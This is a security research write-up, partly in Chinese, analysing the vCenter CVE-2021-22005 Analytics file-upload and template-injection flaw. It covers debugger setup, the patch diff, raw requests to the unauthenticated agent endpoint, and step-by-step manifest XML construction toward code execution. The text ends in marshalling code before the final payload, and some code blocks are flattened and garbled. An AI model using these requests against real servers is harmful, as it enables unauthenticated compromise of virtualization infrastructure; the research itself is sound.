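When CVE-2021-22005 first came out, testbnull analyzed the first half of the vulnerability but did not give the final RCE method. I had already analyzed several other vCenter bugs, so I spent some time on this one and eventually built a working RCE exploit by obtaining the appender object through getAppender(). Interest in the vulnerability has since died down considerably, and several researchers have published POCs/EXPs along the way, so I decided to write up my debugging notes from that time together with some later analysis. After finishing the analysis, my impression was that finding this bug purely through code auditing would be truly impressive, while building the request by combining captured traffic with code auditing should be considerably easier. During testing, my breakpoints caught requests sent by the system itself, and from those you can quickly locate the final resourceItemToJsonLdMapping object that is used for template injection.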

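PS: This article is for technical discussion only. Any illegal use is strictly prohibited, and violators bear full responsibility for the consequences.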

1. Setting up the debugging environment



Version used for reproduction: VMware VirtualCenter 6.7.0 build-17028632, Linux platform



Add the JDWP debug options to the JVM arguments in /etc/vmware/vmware-vmon/svcCfgfiles/analytics.json:

```
"-Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5006",
```

Restart the service and open port 5006 in the firewall:

```
service-control --restart vmware-analytics
iptables -I OUTPUT -p tcp --dport 5006 -j ACCEPT
iptables -I INPUT -p tcp --dport 5006 -j ACCEPT
```



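Breakpoint debugging works:

If that does not work, start the service directly from the command line with debugging enabled: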

```
/usr/java/jre-vmware/bin/vmware-analytics.launcher -Xmx128m -XX:CompressedClassSpaceSize=64m -Xss256k -XX:ParallelGCThreads=1 \
  -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=9999 \
  -Dorg.apache.catalina.startup.EXIT_ON_INIT_FAILURE=TRUE \
  -Danalytics.logDir=/var/log/vmware/analytics -Danalytics.dataDir=/storage/analytics \
  -Danalytics.deploymentNodeTypeFile=/etc/vmware/deployment.node.type -Danalytics.buildInfoFile=/etc/vmware/.buildInfo \
  -Danalytics.agentsDir=/etc/vmware-analytics/agents \
  -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/vmware/analytics -XX:ErrorFile=/var/log/vmware/analytics/java_error.log \
  -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintReferenceGC -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=1024K \
  -Xloggc:/var/log/vmware/analytics/vmware-analytics-gc.log \
  -Djava.security.properties=/etc/vmware/java/vmware-override-java.security \
  -Djava.ext.dirs=/usr/java/jre-vmware/lib/ext:/usr/java/packages/lib/ext:/opt/vmware/jre_ext/ \
  -classpath /etc/vmware-analytics:/usr/lib/vmware-analytics/lib/*:/usr/lib/vmware-analytics/lib:/usr/lib/vmware/common-jars/tomcat-embed-core-8.5.56.jar:/usr/lib/vmware/common-jars/tomcat-annotations-api-8.5.56.jar:/usr/lib/vmware/common-jars/antlr-2.7.7.jar:/usr/lib/vmware/common-jars/antlr-runtime.jar:/usr/lib/vmware/common-jars/aspectjrt.jar:/usr/lib/vmware/common-jars/bcprov-jdk16-145.jar:/usr/lib/vmware/common-jars/commons-codec-1.6.jar:/usr/lib/vmware/common-jars/commons-collections-3.2.2.jar:/usr/lib/vmware/common-jars/commons-collections4-4.1.jar:/usr/lib/vmware/common-jars/commons-compress-1.8.jar:/usr/lib/vmware/common-jars/commons-io-2.1.jar:/usr/lib/vmware/common-jars/commons-lang-2.6.jar:/usr/lib/vmware/common-jars/commons-lang3-3.4.jar:/usr/lib/vmware/common-jars/commons-logging-1.1.3.jar:/usr/lib/vmware/common-jars/commons-pool-1.6.jar:/usr/lib/vmware/common-jars/custom-rolling-file-appender-1.0.jar:/usr/lib/vmware/common-jars/featureStateSwitch-1.0.0.jar:/usr/lib/vmware/common-jars/guava-18.0.jar:/usr/lib/vmware/common-jars/httpasyncclient-4.1.3.jar:/usr/lib/vmware/common-jars/httpclient-4.5.3.jar:/usr/lib/vmware/common-jars/httpcore-4.4.6.jar:/usr/lib/vmware/common-jars/httpcore-nio-4.4.6.jar:/usr/lib/vmware/common-jars/httpmime-4.5.3.jar:/usr/lib/vmware/common-jars/jackson-annotations-2.10.4.jar:/usr/lib/vmware/common-jars/jackson-core-2.10.4.jar:/usr/lib/vmware/common-jars/jackson-databind-2.10.4.jar:/usr/lib/vmware/common-jars/jna.jar:/usr/lib/vmware/common-jars/log4j-1.2.16.jar:/usr/lib/vmware/common-jars/log4j-core-2.8.2.jar:/usr/lib/vmware/common-jars/log4j-api-2.8.2.jar:/usr/lib/vmware/common-jars/platform.jar:/usr/lib/vmware/common-jars/slf4j-api-1.7.30.jar:/usr/lib/vmware/common-jars/slf4j-log4j12-1.7.30.jar:/usr/lib/vmware/common-jars/spring-aop-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/spring-beans-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/spring-context-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/spring-core-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/spring-expression-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/spring-web-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/spring-webmvc-4.3.27.RELEASE.jar:/usr/lib/vmware/common-jars/velocity-1.7.jar \
  com.vmware.ph.phservice.service.Main ph-properties-loader.xml ph-featurestate.xml phservice.xml ph-web.xml
```



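2. Patch analysis

VMware published a security advisory on September 24 that fixes multiple vCenter vulnerabilities. Among them, CVE-2021-22005 is an arbitrary file upload vulnerability rated critical with a CVSS score of 9.8. According to the description, an unauthenticated attacker can upload files by sending requests to port 443, and the vulnerability does not affect vCenter 6.5.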

Key points from the advisory: the Analytics service, access over port 443, file upload leading to command execution, and 6.5 is not affected.

KB article: https://kb.vmware.com/s/article/85717



Diffing the code:

```
6.7\17028579\vmware-analytics
6.7\18485185-new\vmware-analytics
```



analytics-cloud-dataapp-server-6.7.0.jar\com\vmware\ph\phservice\cloud\dataapp\server\DataAppAgentController.class



The patch removes the collect() method from DataAppAgentController.class.

The code in the vulnerable version:



In addition, when the DataAppAgentId class is instantiated, the patch calls isValidCollectorId and isValidCollectorInstanceId to check that the supplied collectorId and collectorInstanceId are well-formed.



com.vmware.ph.phservice.common.internal.IdFormatUtil

It matches the strings against regular expressions with java.util.regex.Pattern; if they do not match, the DataAppAgentId object cannot be instantiated.




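The actual expressions used by IdFormatUtil only appear in the screenshots, so the sketch below uses a hypothetical allow-list regex to illustrate the idea of the patch: reject an ID before any object is built from it. `CollectorIdCheck`, `ID_PATTERN` and `requireValid` are illustrative names, not VMware's API. The extra `..` check assumes, as the agents-directory lookup in section 3.1 suggests, that such IDs can end up in file names.

```java
import java.util.regex.Pattern;

// Sketch of a patch-style identifier check. ID_PATTERN is a HYPOTHETICAL
// allow-list; the real expressions in IdFormatUtil are only in the screenshots.
final class CollectorIdCheck {
    // Letters, digits, '.', '_' and '-', 1 to 64 characters (assumed).
    private static final Pattern ID_PATTERN = Pattern.compile("^[A-Za-z0-9._-]{1,64}$");

    private CollectorIdCheck() {}

    // True only for non-null IDs that match the allow-list and contain no "..".
    static boolean isValidCollectorId(String id) {
        return id != null && ID_PATTERN.matcher(id).matches() && !id.contains("..");
    }

    // Refuses to hand back an ID built from bad input, like the patched constructor path.
    static String requireValid(String id) {
        if (!isValidCollectorId(id)) {
            throw new IllegalArgumentException("invalid collector id: " + id);
        }
        return id;
    }

    public static void main(String[] args) {
        System.out.println(isValidCollectorId("vsphere_health")); // true
        System.out.println(isValidCollectorId("../../tmp/x"));    // false
    }
}
```

An allow-list that is matched against the whole string is used here because it rejects path separators without having to enumerate every dangerous character.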

Another change is in analytics-push-telemetry-server-6.7.0.jar\com\vmware\ph\phservice\push\telemetry\server\AsyncTelemetryController.class

What changed:

```
vmware-analytics\lib\sources\com\vmware\ph\phservice\push\telemetry\server\AsyncTelemetryController#handleSendRequest()
collectorInstanceId:
collectorId:
```

Temporary workaround for this vulnerability:



本文对/analytics/ph/api/dataapp/agent?action=collect漏洞部分进行分析,查看rhttpproxy代理关于analytics服务的路由(/etc/vmware-rhttpproxy/endpoints.conf.d/analytics-proxy.conf):

允许/analytics访问。其实经过测试版本vmware vcenter 6.7并不需要使用..;去访问漏洞接口的

3、命令执行 数据构造



3.1 创建agent 补丁删除的漏洞方法是:analytics-cloud-dataapp-server-6.7.0.jar\com\vmware\ph\phservice\cloud\dataapp\server\DataAppAgentController.class#collect()









Build a basic request to test:

```
POST /analytics/ph/api/dataapp/agent?action=collect&_c=abc&_i=test HTTP/1.1
...
Content-Length: 65

{"manifestContent": "a", "contextData": "b", "objectId": "c"}
```



Line 122 calls com.vmware.ph.phservice.cloud.dataapp.DefaultDataAppAgentManager#getAgent to obtain the agent.





The system looks in /etc/vmware-analytics/agents for a file named parameter[_c] + header[X-Plugin-Type] + ".properties". We did not send an X-Plugin-Type request header, so it looks for /etc/vmware-analytics/agents/abc.properties.

com.vmware.ph.phservice.cloud.dataapp.repository.FileSystemAgentRepository#get()

However, /etc/vmware-analytics/agents/abc.properties does not exist, so the request fails immediately with the error "Did not find agent matching the provided parameters."
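The file-name rule above can be sketched as plain string concatenation. This is a simplification: `AgentPathSketch` and `agentFile` are hypothetical names, and any separator, normalization or validation that the real FileSystemAgentRepository#get() may apply is not shown in the text, so none is modeled here.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Simplified sketch of the lookup described above. AgentPathSketch and agentFile()
// are HYPOTHETICAL names, not the real FileSystemAgentRepository API.
final class AgentPathSketch {
    static final Path AGENTS_DIR = Paths.get("/etc/vmware-analytics/agents");

    private AgentPathSketch() {}

    // collectorId comes from the _c query parameter; pluginType comes from the
    // optional X-Plugin-Type header and is null when the header is absent.
    static Path agentFile(String collectorId, String pluginType) {
        String name = collectorId + (pluginType == null ? "" : pluginType) + ".properties";
        return AGENTS_DIR.resolve(name);
    }

    public static void main(String[] args) {
        // On Linux this prints /etc/vmware-analytics/agents/abc.properties
        System.out.println(agentFile("abc", null));
    }
}
```

Because the request parameter flows straight into a file name, a missing file produces the "Did not find agent" error, which is why an agent has to exist before collect can proceed.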



我们可以使用系统自带的vsphere_health.properties,但是为了多个版本的适配,我们最好选择使用com.vmware.ph.phservice.cloud.dataapp.server.DataAppAgentController#create()去创建一个

构造数据包



1 2 3 4 5 6 7 POST /analytics/ph/api/dataapp/agent?_c=abc&_i=test HTTP/1.1 Host : 192.168.232.196Content-Type : application/jsonX-Deployment-Secret : abcContent-Length : 249{ "manifestSpec" : { } , "objectType" : "a" , "collectionTriggerDataNeeded" : true , "deploymentDataNeeded" : true , "resultNeeded" : true , "signalCollectionCompleted" : true , "localManifestPath" : "a" , "localPayloadPath" : "a" , "localObfuscationMapPath" : "a" }

This creates abc.properties, after which the collect request works normally.



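Most public write-ups of this vulnerability jump straight to the Velocity template injection without explaining how to build an EXP from scratch, so we will build it step by step. The collect() operation starts in com.vmware.ph.phservice.cloud.dataapp.internal.collector.DefaultCollectorDataAppAgent#collect(). The EXP is explained in three key parts: creating the agent, constructing the XML data, and the Velocity template injection.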



3.2 Constructing the XML data

Call stack for XML parsing:

```
com.vmware.ph.phservice.cloud.dataapp.server.DataAppAgentController#collect
  com.vmware.ph.phservice.cloud.dataapp.internal.collector.DefaultCollectorDataAppAgent#collect
    this.createCollectionSpecs(this._dataApp, objectIdToContextData, CollectionTriggerType.ON_DEMAND, inMemoryManifestContentProvider, inMemoryUploadStrategy, true);
    this.createCollector(collectionSpecs, (CollectionSchedule) null, CollectionTriggerType.ON_DEMAND);
```



We focus on collector.collect(); the actual work is done in com.vmware.ph.phservice.collector.internal.core.ConnectionClosingCollectorWrapper#collect().



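Stepping into collect(): com.vmware.ph.phservice.cloud.dataapp.internal.collector.SpecsCollector#collect() -> com.vmware.ph.phservice.cloud.dataapp.internal.collector.SpecsCollector#collectAndSend()

This method performs two important steps: first, it builds a Manifest object from the XML data; second, it runs the collection on manifestToExecute. We start with the first step, the XML construction.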









3.2.1 Restoring the Manifest object from the XML data

In com.vmware.ph.phservice.cloud.dataapp.internal.collector.CollectionTriggerTypeManifestParser#getManifest(), the system parses the user-supplied manifestContent with one of several parsers (XmlManifestParser, VsanHealthJsonManifestParser, VsanPerformanceJsonManifestParser).

The selection rule lives in each parser class's isApplicable():

```
com.vmware.ph.phservice.collector.internal.manifest.xml.XmlManifestParser#isApplicable
com.vmware.ph.phservice.cloud.dataapp.vsan.internal.collector.VsanHealthJsonManifestParser#isApplicable
com.vmware.ph.phservice.cloud.dataapp.vsan.internal.collector.VsanPerformanceJsonManifestParser#isApplicable
```
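The dispatch can be pictured as "ask each parser whether it applies, use the first that does". The sketch below assumes first-match order and uses made-up heuristics (a leading `<` for XML, a leading `{` plus a marker key for the two JSON parsers); the real isApplicable() bodies are only in the screenshots. `ParserSelectionSketch` and `Candidate` are hypothetical names.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Optional;
import java.util.function.Predicate;

// HYPOTHETICAL sketch of isApplicable()-based parser selection. The parser
// names come from the text; the applicability tests are invented heuristics.
final class ParserSelectionSketch {
    // One candidate parser: a name plus its (assumed) applicability test.
    static final class Candidate {
        final String name;
        final Predicate<String> isApplicable;

        Candidate(String name, Predicate<String> isApplicable) {
            this.name = name;
            this.isApplicable = isApplicable;
        }
    }

    static final List<Candidate> PARSERS = Arrays.asList(
            new Candidate("XmlManifestParser", s -> s.trim().startsWith("<")),
            new Candidate("VsanHealthJsonManifestParser",
                    s -> s.trim().startsWith("{") && s.contains("\"health\"")),
            new Candidate("VsanPerformanceJsonManifestParser",
                    s -> s.trim().startsWith("{") && s.contains("\"perf\"")));

    private ParserSelectionSketch() {}

    // Returns the name of the first parser whose test accepts the content.
    static Optional<String> select(String manifestContent) {
        for (Candidate c : PARSERS) {
            if (c.isApplicable.test(manifestContent)) {
                return Optional.of(c.name);
            }
        }
        return Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(select("<manifest></manifest>").orElse("none")); // XmlManifestParser
    }
}
```

The practical consequence, under this assumption, is that a manifest starting with an XML element is routed to XmlManifestParser, which is the parser the rest of this section targets.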

It then calls the parser's getManifest(), i.e. com.vmware.ph.phservice.collector.internal.manifest.xml.XmlManifestParser#getManifest(), which defines the content of each element in turn: <requestSchedules>, <request>, <cdfMapping>.

```java
public Manifest getManifest(String manifestStr, CollectionSchedule schedule) {
    Document manifestDoc = getManifestDocForSchedule(manifestStr, schedule, this._isLegacySchedulingSupported);
    if (manifestDoc == null) {
        // ...
    } else {
        ...[] queries = parseQueries(manifestDoc, this._requestParser);
        ...[] queriesForSchedule = this.getNamedQueriesForSchedule(manifestDoc, schedule, queries);
        if (queriesForSchedule != null && queriesForSchedule.length != 0) {
            ... cdfNamedQueryMapping = ...CdfNamedQueryMapping(manifestDoc, this._cdfMappingParser);
            ... fileNamedQueryMapping = ...FileNamedQueryMapping(manifestDoc, this._fileMappingParser);
            ... obfuscationRules = ...ObfuscationRules(manifestDoc, this._obfuscationRulesParser);
            int recommendedPageSize = XmlManifestUtils....RecommendedPageSize(manifestDoc, 5000);
            ... = ...Builder.forQueries(queriesForSchedule)
                    .withCdfMapping(getNonNullNamedQueryResultSetMapping(cdfNamedQueryMapping))
                    .withFileMapping(getNonNullNamedQueryResultSetMapping(fileNamedQueryMapping))
                    .withObfuscationRules(getNonNullObfuscationRules(obfuscationRules))
                    .withRecommendedPageSize(recommendedPageSize)
                    .build();
        } else {
            // ...
        }
    }
}
```

a. Building the <requestSchedules> element



```java
private static Document getManifestDocForSchedule(String manifestStr, CollectionSchedule collectionSchedule, boolean isLegacySchedulingSupported) {
    boolean containsRequestScheduleSection = XmlManifestUtils....RequestScheduleSection(manifestStr);
    if (containsRequestScheduleSection) {
        ... = XmlManifestUtils....NonDailySection(manifestStr);
        // ...
    } else if (isLegacySchedulingSupported) {
        ... = ...ManifestDocForLegacySchedule(manifestStr, collectionSchedule);
        // ...
    } else {
        // ...
    }
}
```





The class corresponding to the <requestSchedules> element is com.vmware.ph.phservice.collector.internal.manifest.xml.scheduling.data.RequestScheduleSpec

Resulting element: <requestSchedules></requestSchedules>

b. Building the <request> element



```
com.vmware.ph.phservice.collector.internal.manifest.xml.XmlManifestParser#parseQueries
com.vmware.ph.phservice.collector.internal.manifest.xml.XmlManifestUtils#parseRequestSpec
```





The parser for the <request> element is com.vmware.ph.phservice.collector.internal.manifest.xml.query.JaxbRequestSpecParser#parse, which requires a <constraint> element.

The class corresponding to the <request> element is com.vmware.ph.phservice.collector.internal.manifest.xml.query.data.RequestSpec

The class corresponding to the <query> element is com.vmware.ph.phservice.collector.internal.manifest.xml.query.data.QuerySpec

The class corresponding to the <constraint> element is com.vmware.ph.phservice.collector.internal.manifest.xml.query.data.QuerySpec#QuerySpec()

Resulting element: <request><query><constraint><targetType>xxx</targetType></constraint></query></request>

c. Building the <cdfMapping> element

```java
// com.vmware.ph.phservice.collector.internal.manifest.xml.XmlManifestUtils#parseCdfMapping
public static <I, O> Mapping<I, O> parseCdfMapping(Document manifestDoc, MappingParser mappingParser) {
    return parseMapping(manifestDoc, mappingParser, "cdfMapping", true);
}
```



The parser for the <cdfMapping> element is com.vmware.ph.phservice.collector.internal.manifest.xml.mapping.JaxbCdfMappingParser#parse





Line 58 requires the first child node of <cdfMapping> to correspond to the class com.vmware.ph.phservice.collector.internal.manifest.xml.mapping.data.IndependentResultsMapping. After obtaining that IndependentResultsMapping object, the parser calls its build() to return a newly constructed com.vmware.ph.phservice.collector.internal.cdf.mapping.IndependentResultsMapping object.

The class corresponding to the <indepedentResultsMapping> element is com.vmware.ph.phservice.collector.internal.manifest.xml.mapping.data.IndependentResultsMapping

build() reconstructs the IndependentResultsMapping object from the resultSetMappings property, so a resultSetMappings value has to be added; this is explained when we build it later.

```xml
<manifest>
  <requestSchedules></requestSchedules>
  <request>
    <query>
      <constraint>
        <targetType>xxx</targetType>
      </constraint>
    </query>
  </request>
  <cdfMapping>
    <indepedentResultsMapping></indepedentResultsMapping>
  </cdfMapping>
</manifest>
```



我们接着往下看,解析器构建完Manifest对象后开始检查queries变量:com.vmware.ph.phservice.cloud.dataapp.internal.collector.CollectionTriggerTypeManifestParser#getManifest



com.vmware.ph.phservice.cloud.dataapp.iternal.collector.CollectionTriggerTypeManifestParser#filterOnDemandQueries

限制<request>的子标签<query>必须包含name,调整为:

1 <request > <query name =\ "aaa \"> <constraint > <targetType > sss</targetType > </constraint > </query > </request >
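To make the "every query needs a name" rule concrete, the sketch below parses a manifest with the JDK's DOM parser and keeps only the names of `<query>` elements that carry a `name` attribute. It is an approximation of the effect of filterOnDemandQueries, not its code; `QueryNameFilterSketch` is a hypothetical name. Note that the `\"` in the snippet above is the JSON-escaped form used inside manifestContent; the XML itself uses plain quotes.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

// HYPOTHETICAL approximation of the name check on <query> elements.
final class QueryNameFilterSketch {
    private QueryNameFilterSketch() {}

    // Returns the name attribute of every <query> that has one; nameless queries are skipped.
    static List<String> namedQueries(String manifestXml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Refuse DOCTYPEs so the sketch itself is not exposed to XXE.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            Document doc = factory.newDocumentBuilder()
                    .parse(new ByteArrayInputStream(manifestXml.getBytes(StandardCharsets.UTF_8)));
            NodeList queries = doc.getElementsByTagName("query");
            List<String> names = new ArrayList<>();
            for (int i = 0; i < queries.getLength(); i++) {
                String name = ((Element) queries.item(i)).getAttribute("name");
                if (!name.isEmpty()) { // getAttribute returns "" when the attribute is absent
                    names.add(name);
                }
            }
            return names;
        } catch (Exception e) {
            throw new IllegalArgumentException("could not parse manifest", e);
        }
    }

    public static void main(String[] args) {
        String xml = "<manifest><request>"
                + "<query name=\"aaa\"><constraint><targetType>sss</targetType></constraint></query>"
                + "<query><constraint><targetType>sss</targetType></constraint></query>"
                + "</request></manifest>";
        System.out.println(namedQueries(xml)); // [aaa]
    }
}
```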



3.2.2 Running the collection on manifestToExecute

With the Manifest object built, we reach the second step of com.vmware.ph.phservice.cloud.dataapp.internal.collector.SpecsCollector#collectAndSend():





Stepping in: com.vmware.ph.phservice.collector.internal.core.UsageDataCollector#collect -> com.vmware.ph.phservice.collector.internal.core.UsageDataCollector#collectAndUpload -> com.vmware.ph.phservice.collector.internal.core.UsageDataCollector#processStructuredDataCollectors



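The steps here are: collecting the payloads, creating the iterator, checking the iterator, and visiting its elements in turn. The call to map() made while visiting the iterator is the root cause of this vulnerability. The four parts are explained below.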





3.2.2.1 Part one: collecting the payloads

What is ultimately returned is a FluentIterable object that overrides iterator():

```java
fromIterable = this.collectors;
fun = new Function<CdfCollector, Iterable<CollectedPayload>>() {
    public Iterable<CollectedPayload> apply(CdfCollector input) {
        // ...
    }
};
f1 = new FluentIterable<T>() {
    public Iterator<T> iterator() {
        return Iterators.transform(fromIterable.iterator(), fun);
    }
};
f2 = new FluentIterable<T>() {
    public Iterator<T> iterator() {
        return Iterators.concat(Iterables.iterators(f1));
    }
};
return f2;
```



3.2.2.2 第二部分:创建迭代器 开始调用:collectedPayloads.iterator(),即f2.iterator(),调用链:f2.iterator()->f1.iterator()->Iterators.transform()->Iterators.concat()



最终concat()返回了实现hasNext()、next()、remove()的Iterator对象,input是TransformedIterator对象,相当于(伪代码):

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 fromIterator = this.collectors.iterator ();TransformedIterator transformedIterator1 = new TransformedIterator <F, T>(fromIterator) {from ) {return fun.apply(from );TransformedIterator transformedIterator2 = new TransformedIterator <Iterable <? extends T>, Iterator <? extends T>>(transformedIterator1) {Iterator <? extends T> transform(Iterable <? extends T> from ) {return from .iterator ();Iterator iterator1 = new Iterator <T>() {{...} {...} void remove() {...} return iterator1;



3.2.2.2 第三部分:判断迭代器 接着开始调用collectedPayloadsIterator.hasNext()即iterator1.hasNext()判断是否next()存在值,inputs.hasNext()->transformedIterator2.hasNext()->transformedIterator1#hasNext()->this.collectors.iterator().hasNext()



判断存在后,调用inputs.next()进行赋值:inputs.next()->transformedIterator2.next()->transformedIterator1#next()->this.collectors.iterator().next()->transformedIterator1.transform()->fun.apply()
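The important property of this chain is laziness: building the FluentIterable pipeline runs nothing, and fun.apply() (and therefore the collector work that ends in map()) only runs when the iterator is advanced. The sketch below reproduces that behavior with plain java.util stand-ins for Guava's Iterators.transform and Iterators.concat, so it needs no Guava on the classpath; `LazyIterationSketch` and its methods are hypothetical names, and the "collectors" are just strings.

```java
import java.util.Arrays;
import java.util.Collections;
import java.util.Iterator;
import java.util.List;
import java.util.NoSuchElementException;
import java.util.function.Function;

// Minimal stand-ins for Guava's Iterators.transform/concat. Like Guava's
// versions, they are lazy: the function only runs when the iterator advances.
final class LazyIterationSketch {
    private LazyIterationSketch() {}

    static <F, T> Iterator<T> transform(Iterator<F> from, Function<? super F, ? extends T> fn) {
        return new Iterator<T>() {
            public boolean hasNext() { return from.hasNext(); }
            public T next() { return fn.apply(from.next()); }
        };
    }

    // Flattens an iterator of iterators, pulling the next input only when needed.
    static <T> Iterator<T> concat(Iterator<? extends Iterator<? extends T>> inputs) {
        return new Iterator<T>() {
            private Iterator<? extends T> current = Collections.emptyIterator();

            public boolean hasNext() {
                while (!current.hasNext() && inputs.hasNext()) {
                    current = inputs.next(); // this is where fn.apply() runs
                }
                return current.hasNext();
            }

            public T next() {
                if (!hasNext()) throw new NoSuchElementException();
                return current.next();
            }
        };
    }

    // Reports how often the function ran: after construction, after the first
    // hasNext(), and after draining the whole pipeline.
    static int[] applyCounts(List<String> collectors) {
        int[] calls = {0};
        Iterator<Iterator<String>> perCollector = transform(collectors.iterator(), c -> {
            calls[0]++;
            return Arrays.asList(c + "-payload").iterator();
        });
        Iterator<String> payloads = concat(perCollector);
        int afterBuild = calls[0];
        payloads.hasNext();
        int afterHasNext = calls[0];
        while (payloads.hasNext()) {
            payloads.next();
        }
        return new int[] {afterBuild, afterHasNext, calls[0]};
    }

    public static void main(String[] args) {
        System.out.println(Arrays.toString(applyCounts(Arrays.asList("collectorA", "collectorB")))); // [0, 1, 2]
    }
}
```

In this stand-in, hasNext() on the concatenated iterator is already enough to trigger the first apply(), which matches the point made above that visiting the iterator is what finally drives the collection.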





This reaches input.collect(manifest, queryService, context, pageSize), which assigns the <query> and <cdfMapping> we supplied to queries and payloadMapping.

com.vmware.ph.phservice.collector.internal.data.QueryServiceCollector#collect







com.vmware.ph.phservice.collector.internal.data.QueryServiceCollector#filterQueriesForExecution requires IndependentResultsMapping#_queryNameToResultSetMapping to contain an entry whose key is the query's name, i.e. <query name="aaa"> must be paired with <cdfMapping><indepedentResultsMapping><resultSetMappings><entry><key>aaa</key></entry></resultSetMappings></indepedentResultsMapping>
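The pairing rule amounts to a key lookup: a query survives only if its name is also a key in the result-set mappings. A hypothetical sketch of that rule (`QueryFilterSketch` and `queriesForExecution` are illustrative names, and queries are reduced to their names):

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.Map;

// HYPOTHETICAL sketch: a query is executed only if its name is also a key of
// resultSetMappings (<entry><key>...</key></entry>).
final class QueryFilterSketch {
    private QueryFilterSketch() {}

    // Keeps, in order, only the query names that have a mapping entry.
    static List<String> queriesForExecution(List<String> queryNames, Map<String, ?> resultSetMappings) {
        List<String> result = new ArrayList<>();
        for (String name : queryNames) {
            if (resultSetMappings.containsKey(name)) {
                result.add(name);
            }
        }
        return result;
    }

    public static void main(String[] args) {
        Map<String, String> mappings = Collections.singletonMap("aaa", "mapping for aaa");
        System.out.println(queriesForExecution(Arrays.asList("aaa", "bbb"), mappings)); // [aaa]
    }
}
```

If the names do not line up, the query is silently dropped and the mapping is never reached, which is why "aaa" has to appear in both places.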



After the query is added, an Iterable object implementing iterator() is returned. Execution continues to Iterables.transform(result, obfuscationFunction), which returns a FluentIterable object implementing iterator().

Then Iterables.concat(result, perfData) is executed, which also returns a FluentIterable object implementing iterator().

Equivalent pseudocode:

```java
Iterable iterable2 = new Iterable<OUT>() {
    public Iterator<OUT> iterator() {
        return QueryServiceCollector._resultIteratorFactory.getIterator(queryService, responseMapping, modifiedContext, queriesForExecution, pageSize);
    }
};
... = new FluentIterable<T>() {
    public Iterator<T> iterator() {
        return Iterators.transform(..., new QueryServiceCdfCollector.ObfuscationFunction(this._obfuscator, obfuscationRules));
    }
};
... = new FluentIterable<T>() {
    public Iterator<T> iterator() {
        return Iterators.concat(Iterables. ...);
    }
};
```



After the inner transformedIterator1 has been called, transformedIterator2.transform() is called:

transformedIterator2.transform()->from.iterator()->f4.iterator()



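This reaches the iterator() defined above, which returns responseMappingIterable.iterator().

3.2.2.4 Part four: visiting the iterator

com.vmware.cis.data.internal.provider.ProviderRepository#getProviderForModel checks that the content of the <targetType> element exists in _providerByModel; the original exp used "ServiceInstance".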
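Conceptually, `<targetType>` is a key into a model-to-provider map, and an unknown model stops the query before any mapping runs. The sketch models "stops" as an exception; how the real ProviderRepository reacts is not shown in the text. `ProviderLookupSketch` and the provider string are hypothetical; only "ServiceInstance" comes from the source.

```java
import java.util.HashMap;
import java.util.Map;

// HYPOTHETICAL sketch of a model-to-provider lookup like getProviderForModel.
final class ProviderLookupSketch {
    private final Map<String, String> providerByModel = new HashMap<>();

    // Registers a provider for a model type (the provider string is a placeholder).
    void register(String model, String provider) {
        providerByModel.put(model, provider);
    }

    // The <targetType> value must be a registered model, otherwise lookup fails.
    String getProviderForModel(String model) {
        String provider = providerByModel.get(model);
        if (provider == null) {
            throw new IllegalArgumentException("No provider registered for model: " + model);
        }
        return provider;
    }

    public static void main(String[] args) {
        ProviderLookupSketch repo = new ProviderLookupSketch();
        repo.register("ServiceInstance", "hypotheticalProvider");
        System.out.println(repo.getProviderForModel("ServiceInstance")); // hypotheticalProvider
    }
}
```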



Next, com.vmware.ph.phservice.collector.internal.data.QueryServiceCollector.ResultIteratorFactory#getIterator is called,

which starts calling map() on the mapping we supplied in <cdfMapping>:





com.vmware.ph.phservice.collector.internal.cdf.mapping.IndependentResultsMapping#map

com.vmware.ph.phservice.collector.internal.cdf.mapping.ResultSetToCdfPayloadMapping#map





com.vmware.ph.phservice.collector.internal.cdf.mapping.SafeMappingWrapper#map





com.vmware.ph.phservice.collector.internal.cdf.mapping.ResourceItemToJsonLdMapping#map



The original researcher found a Velocity template injection in com.vmware.ph.phservice.collector.internal.cdf.mapping.ResourceItemToJsonLdMapping#map().





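Next, we generate the XML for the <indepedentResultsMapping> element with code:

```java
// JDK 8 (javax.xml.bind); the VMware classes come from the analytics jars.
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Marshaller;

public class Test {
    public static void main(String[] args) throws Exception {
        new Test().testMarshalIndependMapping();
    }

    public void testMarshalIndependMapping() throws Exception {
        ResourceItemToJsonLdMapping resourceItemToJsonLdMapping = new ResourceItemToJsonLdMapping("a", "b");
        List itemMappings = new ArrayList();
        itemMappings.add(resourceItemToJsonLdMapping);
        ResultSetToCdfPayloadMapping resultSetToCdfPayloadMapping =
                new ResultSetToCdfPayloadMapping(itemMappings, new VelocityResourceMapping());
        Map<String, Wrapper<ResultSetToCdfPayloadMapping>> resultSetMappings = new HashMap();
        Wrapper wrapper = new Wrapper(resultSetToCdfPayloadMapping);
        resultSetMappings.put("aaa", wrapper); // key must match <query name="aaa">
        IndependentResultsMapping independentResultsMapping = new IndependentResultsMapping(resultSetMappings);
        marshal(independentResultsMapping);
    }

    void marshal(Object o) throws Exception {
        JAXBContext context = JAXBContext.newInstance(/* ... */ IndependentResultsMapping.class, ResultSetToCdfPayloadMapping.class);
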